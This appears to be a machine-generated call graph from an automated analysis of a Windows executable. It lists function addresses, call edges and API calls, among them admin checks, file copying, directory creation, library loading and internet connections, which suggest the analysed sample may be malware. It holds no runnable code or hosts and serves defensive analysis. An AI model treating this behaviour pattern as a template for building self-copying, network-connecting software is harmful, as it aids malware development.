408c32 16583 418640 4 API calls 16581->16583 16584 408c3a 16583->16584 17497 40a200 TlsGetValue 16584->17497 16585 408c10 17486 40c98e 16585->17486 16588 408c1b 17495 40a200 TlsGetValue 16588->17495 16589 408c22 16591 4187a0 HeapFree 16589->16591 16592 4012ef 16591->16592 16593 4186a0 TlsGetValue 16592->16593 16593->16016 16594->16018 17499 4190e0 TlsGetValue 16595->17499 16597 401318 16597->16025 16598->16035 16599->16061 16600->16068 16601->16079 16603 418710 21 API calls 16602->16603 16604 405b21 GetCursorPos 16603->16604 16605 401467 16604->16605 16606 405f29 16605->16606 16607 405f2f 16606->16607 16607->16607 16608 418710 21 API calls 16607->16608 16609 405f41 16608->16609 16610 40a040 2 API calls 16609->16610 16611 405f4d 16610->16611 16612 40a040 2 API calls 16611->16612 16613 405f5a 16612->16613 17500 418570 GetLastError TlsGetValue SetLastError 16613->17500 16615 405f60 16616 418640 4 API calls 16615->16616 16617 405f6d 16616->16617 16618 418640 4 API calls 16617->16618 16619 405f77 16618->16619 16620 418640 4 API calls 16619->16620 16621 405f82 16620->16621 16622 4185b0 3 API calls 16621->16622 16637 405f8c 16622->16637 16623 406070 16624 4187a0 HeapFree 16623->16624 16625 4060e1 16624->16625 16626 4187a0 HeapFree 16625->16626 16627 4060ea 16626->16627 16628 4187a0 HeapFree 16627->16628 16629 40147d 16628->16629 16639 418570 GetLastError TlsGetValue SetLastError 16629->16639 16630 4185b0 3 API calls 16630->16637 16631 4167d0 9 API calls 16631->16637 16632 40a212 TlsGetValue 16632->16637 16633 416760 5 API calls 16633->16637 16635 40a240 TlsGetValue 16635->16637 16636 418570 GetLastError TlsGetValue SetLastError 16636->16637 16637->16623 16637->16630 16637->16631 16637->16632 16637->16633 16637->16635 16637->16636 16638 40a230 3 API calls 16637->16638 17501 4186a0 TlsGetValue 16637->17501 16638->16637 16639->16109 16641 418710 21 API calls 16640->16641 16642 405310 16641->16642 16643 40a230 3 API calls 16642->16643 16644 405319 16643->16644 16645 40a040 2 API calls 16644->16645 16646 405325 16645->16646 17502 418570 GetLastError TlsGetValue SetLastError 16646->17502 16648 40532b 17503 418570 GetLastError TlsGetValue SetLastError 16648->17503 16650 405333 17504 40bbc2 16650->17504 16653 4185b0 3 API calls 16654 40534e 16653->16654 17549 418570 GetLastError TlsGetValue SetLastError 16654->17549 16656 405367 17550 418570 GetLastError TlsGetValue SetLastError 16656->17550 16658 40536f 16659 4167d0 9 API calls 16658->16659 16660 405386 16659->16660 16661 4185b0 3 API calls 16660->16661 16668 405390 16661->16668 16662 4053e3 17551 418570 GetLastError TlsGetValue SetLastError 16662->17551 16663 40543d 17597 418570 GetLastError TlsGetValue SetLastError 16663->17597 16666 4053e9 17552 404c67 16666->17552 16667 405446 16670 418640 4 API calls 16667->16670 16668->16662 16668->16663 16672 40544e 16670->16672 17598 40a200 TlsGetValue 16672->17598 16673 4185b0 3 API calls 16676 4053fe 16673->16676 16675 405436 16677 4187a0 HeapFree 16675->16677 16678 40543b 16676->16678 16679 40540e 16676->16679 16680 40546d 16677->16680 17599 418770 TlsGetValue 16678->17599 17591 418570 GetLastError TlsGetValue SetLastError 16679->17591 16682 4187a0 HeapFree 16680->16682 16685 405476 16682->16685 16683 405414 17592 418570 GetLastError TlsGetValue SetLastError 16683->17592 16687 4187a0 HeapFree 16685->16687 16689 40547e 16687->16689 16688 40541c 17593 416e30 16688->17593 16691 4187a0 HeapFree 16689->16691 16693 405487 16691->16693 16693->16280 16696 418710 21 API calls 16695->16696 16697 40706a 16696->16697 16698 40a040 2 API calls 16697->16698 16699 407076 16698->16699 16700 40a040 2 API calls 16699->16700 16701 407083 16700->16701 16702 40a040 2 API calls 16701->16702 16703 407090 16702->16703 17958 418570 GetLastError TlsGetValue SetLastError 16703->17958 16705 407096 17959 418570 GetLastError TlsGetValue SetLastError 16705->17959 16707 40709e 17960 418570 GetLastError TlsGetValue SetLastError 16707->17960 16709 4070a6 16710 408683 136 API calls 16709->16710 16711 4070ca 16710->16711 17961 40a212 TlsGetValue 16711->17961 16713 4070cf 16714 416f20 5 API calls 16713->16714 16715 4070d7 16714->16715 16716 4185b0 3 API calls 16715->16716 16717 4070e1 16716->16717 16745 407159 16717->16745 17962 418570 GetLastError TlsGetValue SetLastError 16717->17962 16719 4187a0 HeapFree 16721 40716d 16719->16721 16720 4070f6 16722 405040 58 API calls 16720->16722 16724 4187a0 HeapFree 16721->16724 16723 407105 16722->16723 16725 4185b0 3 API calls 16723->16725 16726 407176 16724->16726 16727 40710f 16725->16727 16728 4187a0 HeapFree 16726->16728 17963 418570 GetLastError TlsGetValue SetLastError 16727->17963 16730 40717f 16728->16730 16732 4187a0 HeapFree 16730->16732 16731 407115 17964 418570 GetLastError TlsGetValue SetLastError 16731->17964 16734 407188 16732->16734 16736 4187a0 HeapFree 16734->16736 16735 40711d 16737 416400 6 API calls 16735->16737 16738 407191 16736->16738 16739 407132 16737->16739 16738->16280 17965 4186a0 TlsGetValue 16739->17965 16741 407137 16742 40a240 TlsGetValue 16741->16742 16743 407142 16742->16743 16744 40a048 4 API calls 16743->16744 16743->16745 16744->16745 16745->16719 16747 40c4fc timeBeginPeriod 16746->16747 16748 40c50e Sleep 16746->16748 16747->16748 16749->16064 16751 418710 21 API calls 16750->16751 16752 405a5c 16751->16752 16753 405a77 16752->16753 16754 405a67 16752->16754 16756 405a91 16753->16756 16757 405a81 16753->16757 16755 40a048 4 API calls 16754->16755 16758 405a75 16755->16758 16760 405aab 16756->16760 16761 405a9b 16756->16761 16759 40a048 4 API calls 16757->16759 17966 418570 GetLastError TlsGetValue SetLastError 16758->17966 16759->16758 16760->16758 16763 40a048 4 API calls 16760->16763 16762 40a048 4 API calls 16761->16762 16762->16758 16763->16758 16765 405aca 17967 418570 GetLastError TlsGetValue SetLastError 16765->17967 16767 405ad6 16768 418640 4 API calls 16767->16768 16769 405ade 16768->16769 16770 418640 4 API calls 16769->16770 16771 405ae9 16770->16771 17968 40a212 TlsGetValue 16771->17968 16773 405aee LoadLibraryW 16774 40a230 3 API calls 16773->16774 16775 405afb 16774->16775 16776 4187a0 HeapFree 16775->16776 16777 405b10 16776->16777 16777->16010 16778->16030 16779->16036 16780->16042 16781->16053 17969 40c666 16782->17969 16784 401357 16785 4186a0 TlsGetValue 16784->16785 16785->16066 16786->16071 16787->16097 16789 418710 21 API calls 16788->16789 16790 408245 16789->16790 16791 40a230 3 API calls 16790->16791 16792 40824e 16791->16792 17979 418570 GetLastError TlsGetValue SetLastError 16792->17979 16794 408254 16795 408683 136 API calls 16794->16795 16796 40827a 16795->16796 17980 40a200 TlsGetValue 16796->17980 16798 401458 16798->16106 16799->16291 16800->16311 16801->16324 16802->16123 16803->16128 16804->16136 16806 418710 21 API calls 16805->16806 16807 403e52 16806->16807 16808 40a040 2 API calls 16807->16808 16809 403e5e IsUserAdmin 16808->16809 16810 403e67 16809->16810 16811 403e9a 16809->16811 17981 418570 GetLastError TlsGetValue SetLastError 16810->17981 18023 418570 GetLastError TlsGetValue SetLastError 16811->18023 16814 403ea0 16816 40793c 42 API calls 16814->16816 16815 403e6d 17982 40793c 16815->17982 16818 403eac 16816->16818 16820 418640 4 API calls 16818->16820 16822 403eb6 16820->16822 16821 418640 4 API calls 16823 403e83 16821->16823 16824 418640 4 API calls 16822->16824 16825 418640 4 API calls 16823->16825 16826 403ec1 16824->16826 16827 403e8e 16825->16827 16828 4185b0 3 API calls 16826->16828 16829 4185b0 3 API calls 16827->16829 16830 403e98 16828->16830 16829->16830 16831 403ed2 16830->16831 16832 403edd PathFileExistsW 16830->16832 18024 40c829 16831->18024 16834 403eea 16832->16834 16835 403edb 16834->16835 18027 418570 GetLastError TlsGetValue SetLastError 16834->18027 16837 4187a0 HeapFree 16835->16837 16838 403f4f 16837->16838 16840 4187a0 HeapFree 16838->16840 16839 403efd 18028 418570 GetLastError TlsGetValue SetLastError 16839->18028 16842 403f57 16840->16842 16842->16144 16843 403f26 16844 408bb3 40 API calls 16843->16844 16845 403f32 16844->16845 18029 40a212 TlsGetValue 16845->18029 16847 403f37 18030 404914 16847->18030 16850 40a230 3 API calls 16850->16835 16851->16155 16852->16164 16853->16178 16854->16182 16855->16190 16856->16202 16857->16206 16858->16213 16859->16230 16860->16237 16861->16249 16862->16271 16863->16278 16864->16293 16866 418710 21 API calls 16865->16866 16867 404de0 16866->16867 18082 408d2b 16867->18082 16996->16034 16997->16040 16998->16054 16999->16078 17000->16112 17001->16115 17002->16125 17004 40c744 wcsncpy wcslen 17003->17004 17005 4019f9 17003->17005 17006 40c778 CreateDirectoryW 17004->17006 17005->16131 17006->17005 17008->16140 17009->16143 17010->16156 17011->16168 17012->16172 17013->16175 17014->16179 17015->16183 17016->16187 17018 4188d0 3 API calls 17017->17018 17019 40ab65 GetModuleFileNameW wcscmp 17018->17019 17020 40aba0 17019->17020 17021 40ab88 memmove 17019->17021 21833 4189b0 TlsGetValue 17020->21833 17021->17020 17023 401a80 17024 40a212 TlsGetValue 17023->17024 17024->16193 17025->16200 17027 41676e 17026->17027 17028 418a10 TlsGetValue 17027->17028 17029 41678a 17028->17029 17030 4188d0 3 API calls 17029->17030 17031 416796 17030->17031 17033 4167a2 17031->17033 21834 418a60 TlsGetValue 17031->21834 17033->16203 17034->16207 17035->16220 17036->16226 17037->16232 17038->16236 17039->16242 17040->16248 17041->16254 17042->16260 17043->16273 17044->16286 17046 4168ef 17045->17046 17053 4167e1 17045->17053 21836 4189e0 TlsGetValue 17046->21836 17048 4168f8 17048->16292 17049 416866 17051 418a10 TlsGetValue 17049->17051 17050 416830 _wcsncoll 17050->17053 17052 4168a7 17051->17052 17054 4168c9 17052->17054 21835 418ae0 TlsGetValue 17052->21835 17053->17049 17053->17050 17056 4188d0 3 API calls 17054->17056 17058 4168d0 17056->17058 17057 4168b7 memmove 17057->17054 17059 4168e1 17058->17059 17060 4168d6 wcsncpy 17058->17060 17059->16292 17060->17059 17061->16301 17063 40a040 2 API calls 17062->17063 17064 409196 17063->17064 17065 40a040 2 API calls 17064->17065 17066 4091a3 17065->17066 17067 40ccf0 12 API calls 17066->17067 17068 4091b0 17067->17068 17069 4091d1 17068->17069 21837 40d250 17068->21837 17071 4187a0 HeapFree 17069->17071 17073 4091dc 17071->17073 17072 4091c8 17074 40ca10 11 API calls 17072->17074 17075 4187a0 HeapFree 17073->17075 17074->17069 17076 4091e4 17075->17076 17076->16215 17077->16219 17078->16225 17079->16231 17080->16244 17082 401b9e 17081->17082 17083 40c7cd 17081->17083 17082->16253 17083->17082 17084 40c7d4 CopyFileW 17083->17084 17084->17082 17085->16265 17086->16272 17087->16294 17089 40ac0c 45 API calls 17088->17089 17090 401c07 17089->17090 17090->16313 17091 4024a7 17090->17091 17092 418710 21 API calls 17091->17092 17093 4024b0 17092->17093 17094 4024d6 17093->17094 17095 4024b7 17093->17095 21867 418570 GetLastError TlsGetValue SetLastError 17094->21867 21866 418570 GetLastError TlsGetValue SetLastError 17095->21866 17098 4024bd 17100 408bb3 40 API calls 17098->17100 17099 4024dc 17101 408bb3 40 API calls 17099->17101 17102 4024ca 17100->17102 17103 4024e8 17101->17103 17104 4185b0 3 API calls 17102->17104 17105 4185b0 3 API calls 17103->17105 17106 4024d4 17104->17106 17105->17106 21868 418570 GetLastError TlsGetValue SetLastError 17106->21868 17108 4024f8 21869 418570 GetLastError TlsGetValue SetLastError 17108->21869 17110 402505 21870 418570 GetLastError TlsGetValue SetLastError 17110->21870 17112 40250d 17113 40ab16 5 API calls 17112->17113 17114 40251a 17113->17114 21871 4186a0 TlsGetValue 17114->21871 17116 40251f 21872 418570 GetLastError TlsGetValue SetLastError 17116->21872 17118 402525 17119 418640 4 API calls 17118->17119 17120 402532 17119->17120 17121 418640 4 API calls 17120->17121 17122 40253c 17121->17122 17123 418640 4 API calls 17122->17123 17124 402547 17123->17124 21873 4186a0 TlsGetValue 17124->21873 17126 40254c 21874 40a212 TlsGetValue 17126->21874 17128 402557 21875 40a212 TlsGetValue 17128->21875 17130 402560 17131 40abf2 45 API calls 17130->17131 17132 402569 17131->17132 17133 40a230 3 API calls 17132->17133 17134 40256e 17133->17134 17135 4187a0 HeapFree 17134->17135 17136 40258d 17135->17136 17136->16313 17137->16331 17138->16334 17140 417cdd 17139->17140 17141 417cf3 TlsAlloc HeapAlloc TlsSetValue 17140->17141 17142 417d1b TlsGetValue HeapReAlloc TlsSetValue 17140->17142 17141->17142 17143 417d57 17142->17143 17144 417d5b 17142->17144 17143->17144 17145 40105d 17143->17145 17148 4184ed HeapAlloc 17144->17148 17145->16341 17149 417d67 17148->17149 17149->17145 17151 412c66 GetProcAddress 17150->17151 17152 412cae LoadLibraryW 17150->17152 17153 412ca7 FreeLibrary 17151->17153 17154 412c79 memset 17151->17154 17155 412ce7 17152->17155 17156 412cbf GetProcAddress 17152->17156 17153->17152 17158 412c96 17154->17158 17155->16347 17157 412ce0 FreeLibrary 17156->17157 17159 412ccf 17156->17159 17157->17155 17158->17153 17159->17157 17160->16352 17161->16356 17162->16361 17164 411a7f 17163->17164 17165 411810 17163->17165 17166 411aaa HeapFree 17164->17166 17167 411aa8 17164->17167 17169 41ffa3 17164->17169 17165->16366 17165->16367 17166->17165 17167->17166 17170 42009e 17169->17170 17172 41ffbb 17169->17172 17170->17164 17172->17170 17173 41ffa3 HeapFree 17172->17173 17174 4187a0 17172->17174 17173->17172 17175 4187ab HeapFree 17174->17175 17176 4187be 17174->17176 17175->17176 17176->17172 17178 4188eb 17177->17178 17179 418911 RtlReAllocateHeap 17178->17179 17180 418944 17178->17180 17181 41770b 17179->17181 17180->17181 17182 418960 HeapReAlloc 17180->17182 17181->16376 17181->16377 17182->17181 17183->16394 17185 41641c 17184->17185 17185->16400 17186->16405 17187->16404 17189 41873a TlsGetValue 17188->17189 17190 41871c 17188->17190 17192 404ae3 17189->17192 17193 41874b 17189->17193 17191 418520 5 API calls 17190->17191 17194 418721 TlsGetValue 17191->17194 17192->16413 17291 419000 HeapAlloc HeapAlloc TlsSetValue 17193->17291 17282 42044e 17194->17282 17197 418750 TlsGetValue 17199 42044e 13 API calls 17197->17199 17199->17192 17292 4187d0 17200->17292 17202 404af8 17202->16417 17203->16420 17204->16422 17205->16424 17206->16426 17207->16428 17208->16432 17209->16434 17211 418710 21 API calls 17210->17211 17212 408160 17211->17212 17213 40a230 3 API calls 17212->17213 17214 408169 17213->17214 17215 40a040 2 API calls 17214->17215 17216 408175 17215->17216 17295 418570 GetLastError TlsGetValue SetLastError 17216->17295 17218 408180 17296 418570 GetLastError TlsGetValue SetLastError 17218->17296 17220 408188 17297 40f1c0 17220->17297 17224 40819f 17225 4187a0 HeapFree 17224->17225 17226 404b56 17225->17226 17227 40a212 TlsGetValue 17226->17227 17227->16438 17228->16440 17230 40f36e WideCharToMultiByte WideCharToMultiByte 17229->17230 17232 40f3bf 17230->17232 17233 4188d0 3 API calls 17232->17233 17234 404b6c 17233->17234 17235 40a212 TlsGetValue 17234->17235 17235->16444 17237 418710 21 API calls 17236->17237 17238 4051a3 17237->17238 17239 40a230 3 API calls 17238->17239 17240 4051ac 17239->17240 17241 40a040 2 API calls 17240->17241 17242 4051b8 17241->17242 17321 418570 GetLastError TlsGetValue SetLastError 17242->17321 17244 4051c3 17322 418570 GetLastError TlsGetValue SetLastError 17244->17322 17246 4051cb 17247 40f1c0 8 API calls 17246->17247 17248 4051db 17247->17248 17323 40a200 TlsGetValue 17248->17323 17250 4051e2 17251 4187a0 HeapFree 17250->17251 17252 404b79 17251->17252 17252->16447 17253->16450 17254->16456 17256 418710 21 API calls 17255->17256 17257 405049 17256->17257 17258 40a230 3 API calls 17257->17258 17259 405052 17258->17259 17260 40a040 2 API calls 17259->17260 17261 40505e 17260->17261 17262 40a040 2 API calls 17261->17262 17263 40506b 17262->17263 17324 418570 GetLastError TlsGetValue SetLastError 17263->17324 17265 405071 17325 418570 GetLastError TlsGetValue SetLastError 17265->17325 17267 405079 17326 407ca3 17267->17326 17270 417730 6 API calls 17271 405098 17270->17271 17402 40a200 TlsGetValue 17271->17402 17273 40509f 17274 4187a0 HeapFree 17273->17274 17275 4050b7 17274->17275 17276 4187a0 HeapFree 17275->17276 17277 404bb3 17276->17277 17277->16459 17278->16462 17279->16468 17280->16474 17281->16478 17283 42047a TlsGetValue 17282->17283 17284 42045e TlsAlloc InitializeCriticalSection 17282->17284 17285 420490 HeapAlloc 17283->17285 17286 420517 HeapAlloc 17283->17286 17284->17283 17287 418738 17285->17287 17288 4204aa EnterCriticalSection 17285->17288 17286->17287 17287->17192 17289 4204ba 17288->17289 17290 4204bc 7 API calls 17288->17290 17289->17290 17290->17286 17291->17197 17293 418817 17292->17293 17294 4187da wcslen RtlAllocateHeap 17292->17294 17293->17202 17294->17293 17295->17218 17296->17220 17301 40f140 17297->17301 17300 40a200 TlsGetValue 17300->17224 17302 40f152 17301->17302 17303 40f19d 17302->17303 17306 40f172 17302->17306 17310 40fcf0 17303->17310 17314 4206d0 17306->17314 17308 40f178 17320 4206c0 ??3@YAXPAX 17308->17320 17311 40fcfc 17310->17311 17312 4188d0 3 API calls 17311->17312 17313 408198 17312->17313 17313->17300 17315 420744 malloc 17314->17315 17316 4206dc 17314->17316 17315->17308 17316->17316 17317 4206ec WideCharToMultiByte 17316->17317 17317->17315 17318 420710 malloc 17317->17318 17318->17315 17319 420722 WideCharToMultiByte 17318->17319 17319->17308 17320->17303 17321->17244 17322->17246 17323->17250 17324->17265 17325->17267 17327 407caa 17326->17327 17327->17327 17328 418710 21 API calls 17327->17328 17329 407cbc 17328->17329 17330 40a040 2 API calls 17329->17330 17331 407cc8 17330->17331 17332 40a040 2 API calls 17331->17332 17336 407cd5 17332->17336 17333 407e7d 17334 4187a0 HeapFree 17333->17334 17335 407e87 17334->17335 17337 4187a0 HeapFree 17335->17337 17336->17333 17338 407d23 17336->17338 17339 407d05 17336->17339 17340 407e90 17337->17340 17404 418570 GetLastError TlsGetValue SetLastError 17338->17404 17403 418570 GetLastError TlsGetValue SetLastError 17339->17403 17343 4187a0 HeapFree 17340->17343 17346 405092 17343->17346 17344 407d0f 17347 418640 4 API calls 17344->17347 17345 407d2f 17348 418640 4 API calls 17345->17348 17346->17270 17349 407d17 17347->17349 17350 407d37 17348->17350 17351 4185b0 3 API calls 17349->17351 17352 4185b0 3 API calls 17350->17352 17353 407d21 17351->17353 17352->17353 17405 418570 GetLastError TlsGetValue SetLastError 17353->17405 17355 407d47 17406 418570 GetLastError TlsGetValue SetLastError 17355->17406 17357 407d4f 17407 418570 GetLastError TlsGetValue SetLastError 17357->17407 17359 407d57 17408 416fd0 17359->17408 17361 407d62 17416 40a212 TlsGetValue 17361->17416 17363 407d67 17417 4169d0 17363->17417 17366 40a230 3 API calls 17367 407d74 17366->17367 17368 4169d0 3 API calls 17367->17368 17369 407d81 17368->17369 17424 4178a0 17369->17424 17371 407d98 17427 4178e0 17371->17427 17373 407da5 17430 40f0b0 17373->17430 17375 407db3 17376 4178e0 HeapSize 17375->17376 17377 407dbc 17376->17377 17378 407dea 17377->17378 17380 4178e0 HeapSize 17377->17380 17379 4178e0 HeapSize 17378->17379 17381 407df7 17379->17381 17382 407dcc 17380->17382 17383 4178a0 RtlAllocateHeap 17381->17383 17437 417910 17382->17437 17385 407dfd 17383->17385 17386 4178e0 HeapSize 17385->17386 17387 407e1c 17386->17387 17388 4178e0 HeapSize 17387->17388 17389 407e3b 17388->17389 17390 4178e0 HeapSize 17389->17390 17391 407e45 17390->17391 17445 407a49 17391->17445 17393 407e4f 17453 4178c0 HeapFree 17393->17453 17395 407e5c 17454 4178c0 HeapFree 17395->17454 17397 407e65 17455 4178c0 HeapFree 17397->17455 17399 407e6e 17456 4178c0 HeapFree 17399->17456 17401 407e77 17401->17333 17402->17273 17403->17344 17404->17345 17405->17355 17406->17357 17407->17359 17409 416fdd 17408->17409 17410 418a10 TlsGetValue 17409->17410 17411 417000 17410->17411 17412 4188d0 3 API calls 17411->17412 17413 41700c 17412->17413 17415 41701c 17413->17415 17457 418a60 TlsGetValue 17413->17457 17415->17361 17415->17415 17416->17363 17418 4169e0 WideCharToMultiByte 17417->17418 17419 4169db 17417->17419 17420 4178a0 RtlAllocateHeap 17418->17420 17419->17418 17421 416a00 17420->17421 17422 416a06 WideCharToMultiByte 17421->17422 17423 407d6f 17421->17423 17422->17423 17423->17366 17425 4178a8 RtlAllocateHeap 17424->17425 17426 4178ba 17424->17426 17425->17371 17426->17371 17428 4178e8 HeapSize 17427->17428 17429 4178fa 17427->17429 17428->17373 17429->17373 17431 40f0b9 17430->17431 17432 40f12b 17430->17432 17431->17432 17433 40f0d0 HeapAlloc 17431->17433 17432->17375 17434 40f123 17433->17434 17435 40f0ea 17433->17435 17434->17375 17436 40f10a HeapFree 17435->17436 17436->17375 17438 417944 17437->17438 17439 417918 17437->17439 17438->17378 17440 417920 HeapReAlloc 17439->17440 17441 417860 17439->17441 17440->17378 17442 417892 17441->17442 17443 417881 HeapAlloc 17441->17443 17444 417870 HeapAlloc 17441->17444 17442->17378 17443->17378 17444->17378 17446 407a4f 17445->17446 17447 418710 21 API calls 17446->17447 17448 407a61 17447->17448 17449 4178a0 RtlAllocateHeap 17448->17449 17450 407a6a 17449->17450 17458 41b630 17450->17458 17452 407ad4 17452->17393 17453->17395 17454->17397 17455->17399 17456->17401 17457->17415 17459 41c092 17458->17459 17460 41b640 17458->17460 17459->17452 17460->17459 17461 41bc17 17460->17461 17463 41bb2f memcpy 17460->17463 17464 41bc84 17461->17464 17465 41d1b0 17461->17465 17463->17460 17464->17452 17466 41d1c4 17465->17466 17467 41d232 memcpy 17466->17467 17468 41d20c memcpy 17466->17468 17469 41d1df 17466->17469 17471 41d259 memcpy 17467->17471 17472 41d278 17467->17472 17468->17464 17469->17464 17471->17464 17472->17464 17473->16507 17474->16536 17475->16538 17476->16517 17477->16517 17478->16560 17479->16569 17480->16571 17482 4188d0 3 API calls 17481->17482 17483 408bde 17482->17483 17483->16574 17484->16580 17485->16585 17487 40c99e 17486->17487 17488 418a10 TlsGetValue 17487->17488 17489 40c9d5 17488->17489 17490 4188d0 3 API calls 17489->17490 17491 40c9e5 17490->17491 17492 40c9f3 memmove 17491->17492 17498 418a60 TlsGetValue 17491->17498 17492->16588 17494 40c9f1 17494->17492 17495->16589 17496->16581 17497->16589 17498->17494 17499->16597 17500->16615 17501->16637 17502->16648 17503->16650 17505 40bd63 17504->17505 17506 40bbcd 17504->17506 17664 4189e0 TlsGetValue 17505->17664 17506->17505 17507 40bbd8 17506->17507 17600 420630 17507->17600 17510 405344 17510->16653 17511 40bbe4 17512 420630 4 API calls 17511->17512 17513 40bbef strcmp 17512->17513 17514 40bc02 17513->17514 17515 40bc14 strcmp 17513->17515 17606 40ba9c strstr 17514->17606 17517 40bc32 strcmp 17515->17517 17518 40bc25 17515->17518 17520 40bc50 strcmp 17517->17520 17521 40bc43 17517->17521 17608 40bac1 strstr 17518->17608 17522 40bc61 17520->17522 17523 40bc6e strcmp 17520->17523 17615 40ba1c strstr 17521->17615 17622 40bb4c strstr 17522->17622 17526 40bc8c strcmp 17523->17526 17527 40bc7f 17523->17527 17531 40bcad strcmp 17526->17531 17532 40bc9d 17526->17532 17627 40b95d strstr 17527->17627 17528 40bd4f 17662 420620 ??3@YAXPAX 17528->17662 17529 40bcff HeapAlloc 17529->17528 17533 40bd20 strncpy 17529->17533 17538 40bcce strcmp 17531->17538 17539 40bcbe 17531->17539 17632 40b91d strstr 17532->17632 17653 4205b0 17533->17653 17535 40bd56 17663 420620 ??3@YAXPAX 17535->17663 17541 40bce4 17538->17541 17542 40bcef 17538->17542 17636 40b838 strstr 17539->17636 17639 40b9ca strstr 17541->17639 17644 40b863 strlen strstr 17542->17644 17543 40bd40 HeapFree 17543->17528 17545 40bd5c 17545->17505 17545->17510 17548 40bc0d 17548->17528 17548->17529 17549->16656 17550->16658 17551->16666 17553 418710 21 API calls 17552->17553 17554 404c75 17553->17554 17555 40a230 3 API calls 17554->17555 17556 404c7e 17555->17556 17557 40a040 2 API calls 17556->17557 17558 404c8a 17557->17558 17559 4117ff 4 API calls 17558->17559 17560 404ca8 17559->17560 17665 40a048 17560->17665 17563 40a048 4 API calls 17564 404cc6 17563->17564 17565 40a048 4 API calls 17564->17565 17566 404cd3 17565->17566 17567 40a048 4 API calls 17566->17567 17578 404ce0 17567->17578 17568 404dad 17813 418770 TlsGetValue 17568->17813 17570 418570 GetLastError TlsGetValue SetLastError 17570->17578 17571 4187a0 HeapFree 17572 404dc0 17571->17572 17574 4187a0 HeapFree 17572->17574 17573 418640 wcslen TlsGetValue RtlReAllocateHeap HeapReAlloc 17573->17578 17575 404dc8 17574->17575 17576 411a76 2 API calls 17575->17576 17577 404dd2 17576->17577 17577->16673 17578->17568 17578->17570 17578->17573 17581 4185b0 3 API calls 17578->17581 17582 404d7e 17578->17582 17668 40a212 TlsGetValue 17578->17668 17669 408683 17578->17669 17581->17578 17807 418570 GetLastError TlsGetValue SetLastError 17582->17807 17584 404d84 17808 418570 GetLastError TlsGetValue SetLastError 17584->17808 17586 404d8c 17809 416f20 17586->17809 17590 404d9e 17590->17571 17591->16683 17592->16688 17929 416af0 17593->17929 17596 40a200 TlsGetValue 17596->16675 17597->16667 17598->16675 17599->16675 17601 42069e malloc 17600->17601 17602 42063c 17600->17602 17601->17511 17602->17602 17603 42064c WideCharToMultiByte 17602->17603 17603->17601 17604 42066d malloc 17603->17604 17604->17601 17605 42067f WideCharToMultiByte 17604->17605 17605->17511 17607 40bab3 17606->17607 17607->17548 17609 40bb24 17608->17609 17610 40bad8 strstr strstr 17608->17610 17609->17548 17611 40bb08 strstr strstr 17610->17611 17612 40bafd 17610->17612 17611->17609 17613 40bb30 17611->17613 17612->17611 17613->17609 17614 40bb36 strlen 17613->17614 17614->17609 17616 40ba33 strstr strstr 17615->17616 17620 40ba90 17615->17620 17617 40ba63 strstr 17616->17617 17618 40ba58 17616->17618 17619 40ba76 strstr 17617->17619 17617->17620 17618->17617 17619->17620 17621 40ba86 strlen 17619->17621 17620->17548 17621->17620 17623 40bb66 strstr strstr 17622->17623 17626 40bba9 17622->17626 17624 40bb8c 17623->17624 17623->17626 17625 40bb94 strstr 17624->17625 17624->17626 17625->17626 17626->17548 17628 40b9b6 17627->17628 17629 40b977 strstr strstr 17627->17629 17628->17548 17629->17628 17630 40b99d 17629->17630 17630->17628 17631 40b9a5 strstr 17630->17631 17631->17628 17633 40b934 strstr 17632->17633 17634 40b958 17632->17634 17633->17634 17635 40b94d strlen 17633->17635 17634->17548 17635->17634 17637 40b85f 17636->17637 17638 40b84f strlen 17636->17638 17637->17548 17638->17637 17640 40b9e1 strstr 17639->17640 17642 40ba12 17639->17642 17641 40b9f7 strstr 17640->17641 17640->17642 17641->17642 17643 40ba09 strlen 17641->17643 17642->17548 17643->17642 17645 40b88f 17644->17645 17651 40b8cd 17644->17651 17645->17645 17646 40b8db strstr 17645->17646 17647 40b8a0 _strnicmp 17645->17647 17648 40b8b5 strstr 17645->17648 17645->17651 17646->17645 17646->17651 17647->17645 17647->17648 17648->17645 17649 40b8f0 17648->17649 17650 40b8f4 strstr 17649->17650 17649->17651 17650->17651 17652 40b90b strlen 17650->17652 17651->17548 17652->17651 17654 420607 17653->17654 17655 4205bb MultiByteToWideChar 17653->17655 17656 4188d0 3 API calls 17654->17656 17655->17654 17659 4205df 17655->17659 17658 420612 17656->17658 17658->17543 17660 4188d0 3 API calls 17659->17660 17661 4205ea MultiByteToWideChar 17660->17661 17661->17543 17662->17535 17663->17545 17664->17510 17814 418820 17665->17814 17667 404cb9 17667->17563 17668->17578 17670 408689 17669->17670 17670->17670 17671 418710 21 API calls 17670->17671 17672 40869b 17671->17672 17673 40a230 3 API calls 17672->17673 17674 4086a4 17673->17674 17675 40a040 2 API calls 17674->17675 17676 4086b0 17675->17676 17677 40a040 2 API calls 17676->17677 17678 4086bd 17677->17678 17679 40a040 2 API calls 17678->17679 17680 4086ca 17679->17680 17681 40a040 2 API calls 17680->17681 17682 4086d7 17681->17682 17683 40a040 2 API calls 17682->17683 17684 4086e4 17683->17684 17821 418570 GetLastError TlsGetValue SetLastError 17684->17821 17686 4086ea 17822 418570 GetLastError TlsGetValue SetLastError 17686->17822 17688 4086f2 17689 40bbc2 59 API calls 17688->17689 17690 408703 17689->17690 17691 4185b0 3 API calls 17690->17691 17692 40870d 17691->17692 17823 418570 GetLastError TlsGetValue SetLastError 17692->17823 17694 408713 17824 418570 GetLastError TlsGetValue SetLastError 17694->17824 17696 40871b 17697 40bbc2 59 API calls 17696->17697 17698 40872c 17697->17698 17699 4185b0 3 API calls 17698->17699 17700 408736 17699->17700 17825 418570 GetLastError TlsGetValue SetLastError 17700->17825 17702 40873c 17826 418570 GetLastError TlsGetValue SetLastError 17702->17826 17704 408744 17827 418570 GetLastError TlsGetValue SetLastError 17704->17827 17706 40874c 17828 418570 GetLastError TlsGetValue SetLastError 17706->17828 17708 408754 17709 40bbc2 59 API calls 17708->17709 17710 408765 17709->17710 17829 40a212 TlsGetValue 17710->17829 17712 40876a 17830 4172d0 17712->17830 17714 408772 17840 4186a0 TlsGetValue 17714->17840 17716 408777 17717 40a240 TlsGetValue 17716->17717 17719 408783 17717->17719 17718 408791 InternetOpenW InternetSetOptionW 17720 4087d3 17718->17720 17719->17718 17721 408823 17720->17721 17722 408813 17720->17722 17724 40a048 4 API calls 17721->17724 17723 40a048 4 API calls 17722->17723 17725 408821 17723->17725 17724->17725 17726 408850 InternetConnectW 17725->17726 17727 40a048 4 API calls 17725->17727 17841 418570 GetLastError TlsGetValue SetLastError 17726->17841 17727->17726 17729 408886 17842 418570 GetLastError TlsGetValue 